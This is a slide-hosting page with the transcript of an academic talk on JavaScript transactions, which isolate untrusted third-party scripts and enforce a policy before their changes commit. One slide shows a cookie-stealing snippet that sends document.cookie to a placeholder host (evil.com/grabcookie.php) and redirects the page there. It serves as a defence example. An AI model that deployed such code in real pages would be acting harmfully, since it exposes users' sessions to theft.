1 / 19

The Case for JavaScript Transactions

Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010. The Case for JavaScript Transactions. Problem. Web applications include third party content Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript.

dakota-hines
Download Presentation

The Case for JavaScript Transactions

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010 The Case for JavaScript Transactions

  2. Problem PLAS 2010 • Web applications include third party content • Examples: widgets, advertisements, libraries • May contain untrusted, malicious JavaScript

  3. Example from nytimes.com PLAS 2010 • Rouge third party advertisement • Displayed image of fake virus scan • Client security and privacy at risk

  4. Goal PLAS 2010 • Protect Web application data by isolating untrusted JavaScript code • Must handle arbitrary 3rd party code written in JavaScript • Including constructs such as eval, this, with. • Must enforce powerful security policies • Allow pop-ups from white-listed websites only.

  5. Outline PLAS 2010 • Problem • Transcript • Example • Implementation • Related Work • Conclusion

  6. Solution: Transcript Extend JavaScript to support Transactions Execute untrusted content speculatively Commit changes after policy enforcement PLAS 2010 Web Application Transaction

  7. Transcript features Speculative execution of unmodified third party JavaScript code Suspend transactions on DOM and AJAX operations Transactional execution of event handlers PLAS 2010

  8. Schematic use of Transcript // Web application code var tx = transaction{ ... // unmodified 3rd party code ... }; // Introspection block goes below /* policy enforcement code */ // validate actions of the transaction tx.commit(); //Rest of the Web application code PLAS 2010 Transaction Web Application

  9. Outline PLAS 2010 • Problem • Transcript • Example • Implementation • Related Work • Conclusion

  10. Example: Untrusted code // Web application code var tx = transaction{ var image = document.createElement(‘img’); var url = "http://evil.com/grabcookie.php"; var params = document.cookie; image.src = url + "?cookie=" + params; document.body.appendChild(image); ... window.location = "http://evil.com"; }; PLAS 2010 Web Application Transaction

  11. PLAS 2010 Transcript Runtime Transaction object tx Transaction object tx 3rd party 3rd party read and write sets read and write sets call stack call stack Web application code … tx = transaction { ... body.appendChild(image); ... }; do { ... tx = tx.resume(); ... } while(tx.isSuspended()); tx.commit(); Transcript runtime system 1 2 3rd-party call stack 1 web app web app … … Transcript runtime applies the write set changes to the JavaScript heap when the transaction commits. Introspection block On a transaction suspend, the Transcript runtime saves all the i) read write sets , and ii) stack frames till the nearest transaction delimiter to create a Transaction object 2 3 4 3rd party 3 resume call stack 4 web app* web app* … … Transcript runtime loads the saved read write sets and stack frames when the transaction resumes. tx’s write set + Heaporig = Heapnew … Rest of the Web application 5

  12. Transaction suspend and resume PLAS 2010 var tx = transaction{ ... document.body.appendChild(image); }; do{ var rs = tx.getReadSet(), arg = tx.getArgs(); switch(tx.getCause()) { case "appendChild": if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]); break; }; /* end switch */ tx = tx.resume(); }while(tx.isSuspended()); Transaction Web Application Policy if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]);

  13. Read and Write Sets var tx = transaction{ ... window.location = "http://evil.com"; }; /* Introspection Code */ var ws = tx.getWriteSet(); if(ws.checkMembership(window,"location")){ var loc = ws.getValue(window, "location"); if(!isWhiteListed(loc))‏ to_commit = false; } // Rest of the web application code PLAS 2010 Transaction Web Application Policy var ws = tx.getWriteSet(); if(ws.checkMembership(window,"location")){ var loc = ws.getValue(window, "location"); if(!isWhiteListed(loc))‏ to_commit = false; }

  14. Outline PLAS 2010 • Problem • Transcript • Example • Implementation • Related Work • Conclusion

  15. Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features transaction keyword and Transaction object Modified interpreter op-codes to Log all object accesses Suspend on DOM / AJAX calls For details on semantics of the transactions, kindly refer the paper. PLAS 2010

  16. Outline PLAS 2010 • Problem • Transcript • Example • Implementation • Related Work • Conclusion

  17. Related Work Staged information flow in JavaScript: PLDI'09 hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code Conscript: S&P'10 aspect-oriented framework to specify and enforce fine-grained security policies for Web applications AdJail: USENIX Security'10 isolation mechanism to protect Web application content from malicious advertisements Caja, FBJS, AdSafe, etc. PLAS 2010

  18. Conclusion JavaScript transactions provide isolation Suspend operations that break isolation Resume operation if web application allows Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit No restriction or changes to third party code PLAS 2010

  19. PLAS 2010 Questions ?

More Related